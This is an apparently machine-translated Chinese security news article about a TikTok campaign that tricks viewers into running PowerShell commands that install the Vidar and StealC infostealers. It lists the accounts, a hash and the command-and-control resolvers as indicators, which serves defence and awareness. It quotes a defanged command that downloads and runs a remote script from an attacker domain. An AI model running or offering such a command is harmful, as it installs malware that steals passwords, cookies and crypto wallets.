在一项突出威胁行为者不断发展策略的发展中,网络犯罪分子已经开始利用TikTok的普及来分发复杂的信息窃取恶意软件。

这个新活动专门提供Vidar和StealC信息窃取者,欺骗用户以激活合法软件或解锁Windows OS,Microsoft Office,CapCut和Spotify等应用程序的高级功能为幌子执行恶意PowerShell命令。

与依赖受损网站或网络钓鱼电子邮件的传统恶意软件分发方法不同,这种攻击媒介完全通过视频内容利用社交工程。

威胁行为者创建不露面的视频 – 可能使用AI工具生成 – 为用户提供一步一步的指令,以无意中在自己的系统上安装恶意软件。

这种方法特别阴险,因为它在平台上没有留下恶意代码,用于检测安全解决方案,所有可操作的内容都在视觉和听觉上提供。

Trend identifiedMicro研究人员确定了参与此活动的多个TikTok账户,包括@gitallowed,@zane.houghton,@allaivo2,@sysglow.wow,@alexfixpc和@digitaldreams771。

他们的调查显示,一些视频获得了显着的牵引力,其中一个特定视频吸引了超过20,000个喜欢,100条评论,并达到了约50万次观看。

这种广泛的曝光证明了该活动的潜在影响,并突出了TikTok的算法覆盖范围如何放大恶意内容。

对受害者的后果是严重的,因为这些信息窃取者可以窃取敏感数据,窃取凭据并可能损害业务系统。

安装后,恶意软件会与命令和控制服务器建立通信,使攻击者能够从受损设备中获取有价值的信息。

这对个人用户和组织都构成重大威胁,因为被盗的凭据可能导致账户接管、财务欺诈和进一步的网络渗透。

感染机制与技术分析

感染链从用户按照视频指令打开PowerShell(通过按Windows + R并键入“powershell”)然后执行类似于:-的命令时开始。

iex (irm https://allaivo[.]me/spotify)

这个看似无害的命令下载并执行一个远程脚本(SHA256: b8d9821a478f1a37070867eb2038c464cc59ed31a4c7413ff768f2e14d3886),启动感染过程。

执行后,脚本在用户的APPDATA和LOCALAPPDATA文件夹中创建隐藏目录,然后将这些位置添加到Windows Defender排除列表中 – 一种复杂的规避技术,可帮助恶意软件避免检测。

然后,恶意软件继续下载其他有效载荷,包括Vidar和StealC信息窃取器。这些恶意软件变体特别危险,因为它们针对敏感信息,包括保存的密码,加密货币钱包和身份验证cookie。安装后,恶意软件连接到各种命令和控制服务器,包括滥用的合法服务。

例如,Vidar使用Steam配置文件(hxxps://steamcommunity[.]com/profiles/76561199846773220)和Telegram频道(hxxps://t[.]me/v00rd)作为“Dead Drop Resolvers”来隐藏其实际的C&C基础设施 – 一种使跟踪和中断更具挑战性的技术。使这场运动特别有效的是它如何将社会工程与技术开发相结合。通过作为访问流行软件高级功能的有用教程,视频与观众建立信任,然后观众愿意执行损害其系统的命令。这代表了基于社交媒体的攻击的重大演变,表明威胁行为者如何继续调整其策略以利用用户行为并逃避传统的安全控制。

这场运动展示了社会工程攻击的演变性质,以及需要提高社交媒体内容的安全意识。

用户应该对未经请求的技术指令保持健康的怀疑态度,特别是那些涉及PowerShell命令的指令,无论来源可能看起来多么合法或有帮助。